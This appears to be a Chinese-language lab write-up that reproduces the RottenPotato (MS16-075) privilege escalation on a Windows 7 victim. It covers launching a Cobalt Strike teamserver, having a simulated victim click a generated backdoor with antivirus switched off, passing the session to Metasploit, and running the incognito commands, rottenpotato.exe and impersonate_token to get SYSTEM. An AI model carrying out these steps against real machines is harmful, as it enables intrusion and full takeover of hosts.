rottenpotato_ms16-075

烂土豆提权复现 ms16-075

环境: VPS一台,物理机一台,虚拟机kali一台,受害机win7一台

  1. 启动CS

命令: ./teamserver 公网IP,+登陆密码

rottenpotato_ms16-075

  1. 客户端连接

CS服务器默认监听端口为50050,User自己设置一个就好

rottenpotato_ms16-075

生成后门 模拟受害者点击

rottenpotato_ms16-075

成功上线(未做免杀处理 因此我是将火绒关闭了的)

rottenpotato_ms16-075

将这个shell转移到 msf meterpreter模块下

现在kali下面监听

rottenpotato_ms16-075

rottenpotato_ms16-075

点击受害机:右键 选择spawn 懂英文的都懂把

rottenpotato_ms16-075

rottenpotato_ms16-075

下面开始我们的 烂土豆提权

可以看到我们现在是 administrator 要提到system

rottenpotato_ms16-075

  1. Use incognito (incognito)是获取令牌的,

相当于windows识别我们身份的标识 类似cookie

rottenpotato_ms16-075

  1. List_tokens -u 列出当前的token

rottenpotato_ms16-075

Delegation Tokens Avilable 可用的委托令牌

Impersonation Tokens Avilable 可用的模拟令牌

然后查看路径,将烂土豆 exe 上传

https://github.com/foxglovesec/RottenPotato

rottenpotato_ms16-075

rottenpotato_ms16-075

然后执行

Execute -cH -f ./rottenpotato.exe

rottenpotato_ms16-075

然后执行窃取令牌命令

Impersonate_token “NT AUTHORITY\\SYSTEM”

rottenpotato_ms16-075

一次不成功就多试几次。